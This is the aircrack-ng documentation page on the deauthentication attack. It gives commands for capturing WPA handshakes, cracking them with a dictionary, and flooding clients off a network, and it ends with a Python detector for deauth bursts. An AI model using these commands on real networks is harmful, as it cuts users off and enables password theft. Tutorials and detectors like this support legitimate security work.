Deauthentication
Usage
- Recovering a hidden (not broadcasted) ESSID
- Capturing WPA handshakes by forcing clients to reauthenticate
- Generating ARP requests (Windows clients sometimes flush their ARP cache when disconnected)
Of course, this attack is totally useless if there are no associated wireless clients.
It is usually more effective to target a specific station using the -c parameter.
WPA Handshake capture with an Atheros
airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
(switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap
Here is the explanation of the above commands:
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
Where:
- -c 6 is the channel to listen on
- --bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point
- -w out is the file prefix of the file name to be written
- ath0 is the interface name
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Where:
- -0 means deauthentication attack
- 5 is the number of groups of deauthentication packets to send out
- -a 00:14:6C:7E:40:80 is the MAC address of the access point
- -c 00:0F:B5:AB:CB:9D is the MAC address of the client to be deauthenticated
- ath0 is the interface name
Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
ARP request generation with a Prism2 card
airmon-ng start wlan0
airodump-ng -c 6 -w out wlan0
(switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
After sending the five batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
If the driver is wlan-ng, you should run the airmon-ng script (unless you know what to type); otherwise the card won't be correctly set up for injection.
Mass denial-of-service with a RT2500 card
airmon-ng start ra0
aireplay-ng -0 0 -a 00:13:10:30:24:9C ra0
With parameter 0, this attack loops forever, sending deauthentication packets to the broadcast address and thus preventing clients from staying connected. Sadly, the most up-to-date drivers and firmware ignore deauthentications sent to the broadcast address, so you need to send them directly to each client using the -c option as described above.
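As an added defensive counterpart that is not part of the aircrack-ng documentation, the following Python script parses raw 802.11 deauthentication frames from a capture and flags bursts of the shape aireplay-ng -0 produces, reporting whether the frames went to the broadcast address (the mass denial-of-service form) or to specific stations (the -c form). All MAC addresses, timestamps and reason codes are constructed sample data, and the frame builder exists only to create that sample in memory.

```python
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH_FC = 0xC0  # frame control byte 0: type 0 (management), subtype 12 (deauthentication)

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))

def build_deauth(dst, src, bssid, reason, seq=0):
    """Build a raw 802.11 deauthentication frame; used here only to construct sample input."""
    hdr = struct.pack("<BBH", DEAUTH_FC, 0, 0)  # frame control, flags, duration
    hdr += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    hdr += struct.pack("<H", seq << 4)  # sequence control: sequence number in the upper 12 bits
    return hdr + struct.pack("<H", reason)  # body: 2-byte reason code

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for a deauthentication frame, else None."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC:
        return None
    reason = struct.unpack_from("<H", frame, 24)[0]
    return mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]), reason

def detect_deauth_flood(capture, window=2.0, threshold=5):
    """capture: list of (timestamp, raw_frame). Flag each BSSID that emits at least
    `threshold` deauths within any `window` seconds; note broadcast vs targeted stations."""
    per_bssid = defaultdict(list)  # bssid -> [(timestamp, destination)]
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed:
            per_bssid[parsed[2]].append((ts, parsed[0]))
    alerts = []
    for bssid, events in per_bssid.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding window over the sorted timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                targets = {dst for _, dst in events[start:end + 1]}
                alerts.append({"bssid": bssid, "count": end - start + 1,
                               "broadcast": BROADCAST in targets, "targets": sorted(targets)})
                break
    return alerts

# Constructed sample: five deauths from the page's AP to one station inside ~1 s, plus one unrelated deauth.
AP, STA = "00:14:6c:7e:40:80", "00:0f:b5:ab:cb:9d"
SAMPLE = [(12.0 + i * 0.3, build_deauth(STA, AP, AP, 7, seq=i)) for i in range(5)]
SAMPLE.append((20.0, build_deauth("00:11:22:33:44:55", "aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:01", 3)))
```

Running `detect_deauth_flood(SAMPLE)` reports one alert for the sample AP with five targeted frames and no broadcast component; a single deauth from a station leaving normally does not trip the threshold.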